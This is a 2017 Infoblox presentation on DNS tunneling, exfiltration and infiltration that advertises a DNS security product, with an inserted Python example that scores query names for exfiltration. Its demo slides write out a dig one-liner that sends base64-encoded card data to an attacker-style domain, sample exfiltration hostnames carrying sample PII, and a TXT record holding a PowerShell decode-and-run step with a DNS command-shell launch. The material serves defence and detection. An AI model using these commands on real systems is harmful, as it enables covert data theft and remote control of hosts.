
© 2017 Infoblox Inc. All Rights Reserved.
How to Secure Your Data From DNS based Exfiltration
Philip Parker, Vadim Pavlov
Who are we?

Infoblox Senior Technical Marketing Engineers - Security

Philip Parker

Vadim Pavlov

Agenda

• Stealing Data – Why and What Kind?
• DNS as a Pathway for Data In/Exfiltration
• Infoblox ActiveTrust Cloud
• Demo

What the Bad Guys are After and Why

PII (Personally Identifiable Information): Information like social security numbers of employees or customers that cybercriminals can use to steal identity, or sell in the underground market for profit

Regulated Data: Data related to PCI DSS and HIPAA compliance that can be misused

Intellectual Property: Data that can give an organization a competitive advantage

Other Sensitive Information: Credit card numbers, company financials, payroll and emails, and deny access to this and other data (Ransomware)

Why: Hacktivism, Espionage, Financial Profit, RansomWare


DNS tunneling attacks let infected endpoints or malicious insiders exfiltrate data.

• Attackers have recently used DNS tunneling in cases involving the theft of millions of accounts. [1]
• 46% of large businesses have experienced DNS exfiltration. [2]
• $4M: average consolidated cost of a data breach. [3]
• A recent high-profile data breach is likely to cost more than $100M. [4]
Data Exfiltration/Infiltration DNS Queries
• Sophisticated (zero-day)
• Infected endpoint gets access to file containing sensitive data
• It encrypts and converts info into encoded format
• Text broken into chunks and sent via DNS using hostname.subdomain, TXT records and other Resource Records
• Transferred data reconstructed at the other end
• Can use spoofed addresses to avoid detection

Diagram: Infected endpoint (ENTERPRISE) -> DNS server -> INTERNET -> Attacker controlled server thief.com (C&C); data flows out in the queries, C&C commands flow back.

Data Exfiltration via host/subdomain
Simplified/unencrypted example:
NameMarySmith.foo.thief.com
MRN100045429886.foo.thief.com
DOB10191952.foo.thief.com
MarySmith.foo.thief.com
SSN-543112197.foo.thief.com
DOB-04-10-1999.foo.thief.com
MRN100045429886.foo.thief.com

DNS Exfiltration
Client request
$ echo " John/Smith/1234123412340987/94040 " | base64 | xargs -I '{}' dig {}.xn---d1asm.net

; <<>> DiG 9.8.3-P1 <<>> IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36238
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net. IN A

;; AUTHORITY SECTION:
xn---d1asm.net. 1800 IN SOA ns1.xn--d1asm.net. root.xn---d1asm.net. 201702301 3600 3600 3600 1800

;; Query time: 20 msec
;; SERVER: 208.69.39.2#53(208.69.39.2)
;; WHEN: Wed Jun 14 12:15:22 2017
;; MSG SIZE rcvd: 125

DNS Server query log
14-Jun-2017 12:15:22.614 queries: info: client 192.0.0.10#30531 (IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net): query: IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net IN A -ED (192.0.0.1)

DNS Infiltration
Client request
$ dig dnsmsg....xn---d1asm.net TXT

; <<>> DiG 9.8.3-P1 <<>> dnsmsg.....xn---d1asm.net TXT
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45611
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;dnsmsg....xn---d1asm.net. IN TXT

;; ANSWER SECTION:
dnsmsg.....xn---d1asm.net. 30 IN TXT "$e='…'\;" "$e+='…'\;" (further base64-encoded chunks omitted) "$d = dec($e)\;" "IEX $d\;" "cotte -Domain cspg.pw -e cmd.exe"

;; Query time: 4 msec
;; SERVER: 208.69.39.2#53(208.69.39.2)
;; WHEN: Wed Jun 14 12:33:15 2017
;; MSG SIZE rcvd: 666

Communications via DNS Tunneling
• Uses DNS as a covert communication channel to bypass Internet firewalls
• Attacker tunnels other protocols like SSH, or web within DNS
• Enables attackers to easily insert malware, pass stolen data or tunnel IP traffic without detection
• A DNS tunnel can be used as a full bi-directional remote-control channel for a compromised internal host

Diagram: Client-side tunnel program (ENTERPRISE) -> encoded IP/Data in DNS queries -> INTERNET -> DNS server -> IP traffic/Data

Some well known “Proof of Concept” Tunneling software:
• Iodine
• OzymanDNS
• SplitBrain
• DNS2TCP

Infoblox ActiveTrust® Cloud

Protect Devices Everywhere—On-Premises, Roaming and in Remote Office/Branch Office

Traditional Network Security does not address Security Gap in DNS

Advanced DNS Threats vs Network Security Layers:
  (1) Block Zero Day Data Exfiltration & Infiltration over DNS
  (2) Block advanced malware communications over DNS (e.g. DGA, Fast Flux)
  (3) Block DNS Server attacks (e.g. NXDomain, Hijack)

Security layer          (1)   (2)   (3)
Sandboxing (APT)        No    No    No
End Point Malware/AV    No    No    No
Secure Web Gateway      No    No    No
NGFW, IDS/IPS           No    No    No
DLP                     No    No    No
DDOS                    No    No    Rate Limiting only
Secure DNS              Yes   Yes   Yes

ActiveTrust® Cloud—Functional Summary
Highly scalable protection for devices on-premises, roaming and in remote office/branch office

Detect and Contain Malware using DNS | Prevent DNS Based Data Exfiltration That Other Systems Can’t Detect | Improved Visibility and Context

• Stop C&C/botnet communications at DNS choke point
• Data Exfiltration, DGA, Fast Flux, and DNS Messenger detection using machine learning
• Improved Visibility and Rich Network Context
• Unified Policy Management, analytics and reporting
• Ecosystem Integrations (with on-premise option)

Components

• DNS Firewall/Response Policy Zones (RPZs)
• DNS Threat Insight - Data Exfiltration, DGA, Fast Flux and DNS Messenger Detection
• Verified Threat Intelligence
• Dossier - Threat Investigation
• Cloud Services Portal
• Reporting and Analytics
• ActiveTrust Endpoint or DNS Forwarding Proxy (agentless)
• Recursive DNS Services with geo-location response

ActiveTrust Cloud tightly integrates with on-premises DDI for enriched visibility and ecosystem integrations
ATC Workflow Scenarios

Diagram (labels only): Encrypted DNS Query, Embeds Client ID and MAC; (With DNS Forwarding Proxy); (No DNS Forwarding Proxy); Connector.

Threat Insight - Behavior Analytics with Machine Learning

Model features (diagram): Entropy, Size, Lexical Analysis, Frequency, N-Gram

• Detects and prevents 0-day DNS based threats
• Automatically adds destinations to RPZ feed and scales enforcement
• Detects and prevents:
  • DNS Tunneling
  • Data Exfiltration/Infiltration
  • DGA
  • Fastflux
  • DNS Messenger

How Behavior Analytics Works
Detects sophisticated data exfiltration techniques that don’t have well-known signatures (zero day)

1. Looks at TXT records, A, AAAA records
2. Detects presence of data using lexical and temporal analysis
3. Certain attributes add to a threat score, others subtract from it
4. Final score classifies a request as exfiltration or not
5. If exfiltration is found, automatically adds destinations to special internal RPZ feed
6. Scales protection to other parts of the network

Model features (diagram): Entropy, Size, Lexical Analysis, Frequency, N-Gram

How DNS Threat Insight Works to Detect Data Exfiltration
Threat Insight analyzes based on Queried Domains:
• Length of subdomain
• The way the letters are organized
• Amount of information

Malicious:
MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.joedomain.com
NVWW2IDPOZQWY5DJNZSQ.t.joedomain.com
*.t.joedomain.com

Normal:
www.google.com
Inca.Infoblox.com
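The scoring described on the two preceding slides (size, entropy and lexical attributes of the queried name adding to or subtracting from a threat score) and the query log format shown on the DNS Exfiltration slide can be tried out with the following added example; it is not Infoblox code, and the thresholds, the two-label-zone assumption, the helper names and the sample log lines are mine.

```python
import base64, binascii, math, re
from collections import Counter

# Pulls client, query name and type out of a BIND-style query log line (format shown on the DNS Exfiltration slide).
LOG_RE = re.compile(r"client (?P<src>[\d.]+)#\d+ .*?query: (?P<qname>\S+) IN (?P<qtype>\S+)")

def shannon_entropy(s):  # bits per character: encoded/random data scores high, real words low
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s.lower()).values()) if s else 0.0

def decodes_as_base64_text(s):
    """True if s is valid base64 (padding restored) that decodes to >= 8 mostly printable bytes."""
    try:
        raw = base64.b64decode(s + "=" * (-len(s) % 4), validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) >= 8 and sum(32 <= b < 127 for b in raw) / len(raw) > 0.9

def score_qname(qname, zone_labels=2):
    """Score the labels left of the registered domain (assumption: a 2-label zone such as thief.com)."""
    sub = ".".join(qname.rstrip(".").split(".")[:-zone_labels])
    flat = sub.replace(".", "")
    longest = max((len(label) for label in sub.split(".")), default=0)
    ent = shannon_entropy(flat)
    vowels = sum(c in "aeiou" for c in flat.lower()) / len(flat) if flat else 0.0
    score = 0
    score += 2 if longest >= 30 else 1 if longest >= 16 else 0  # Size: long labels carry data
    score += 2 if ent > 4.0 else 1 if ent > 3.5 else 0          # Entropy: encoded/random data
    score += 1 if longest >= 16 and vowels < 0.2 else 0         # Lexical: unpronounceable label
    score += 2 if re.search(r"\d{8,}", flat) else 0             # Lexical: long digit run (MRN, SSN, DOB)
    score += 2 if decodes_as_base64_text(flat) else 0           # Payload decodes to readable text
    return {"qname": qname, "entropy": round(ent, 2), "score": score, "exfil": score >= 3}

def scan_log(lines):
    """One scored record per parsable query log line; unparsable lines are skipped."""
    return [{"src": m["src"], "qtype": m["qtype"], **score_qname(m["qname"])}
            for m in map(LOG_RE.search, lines) if m]

def log_line(ts, src, port, qname):
    """Constructed sample line in the slide's query log format (hypothetical helper)."""
    return f"14-Jun-2017 {ts} queries: info: client {src}#{port} ({qname}): query: {qname} IN A -ED (192.0.0.1)"

# Constructed sample log; the query names are the ones shown on the slides.
SAMPLE_LOG = [
    log_line("12:15:22.614", "192.0.0.10", 30531, "IEpvaG4vU21pdGgvMTIzNDEyMzQxMjM0MDk4Ny85NDA0MCAK.xn---d1asm.net"),
    log_line("12:15:23.001", "192.0.0.10", 30532, "www.google.com"),
    log_line("12:15:23.250", "192.0.0.11", 30533, "MRZGS3TLEBWW64TFEBXXMYLMORUW4ZI.t.joedomain.com"),
    log_line("12:15:23.900", "192.0.0.12", 30534, "MRN100045429886.foo.thief.com"),
    log_line("12:15:24.100", "192.0.0.12", 30535, "Inca.Infoblox.com"),
]
```

scan_log(SAMPLE_LOG) flags the base64 label, the joedomain.com label and the MRN label as exfil and leaves www.google.com and Inca.Infoblox.com unflagged; a production scorer would use a public suffix list instead of the fixed two-label zone and add the per-client frequency features the slides list.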

The Motion of Malware Through Networks
Malware uses DNS at every stage

• Penetration/Infiltration: Query malicious domains and report to C&C
• Infection: Download Malware to the infected host
• Ex/Infiltration: Transport the data offsite

Diagram: DNS Server
Demo
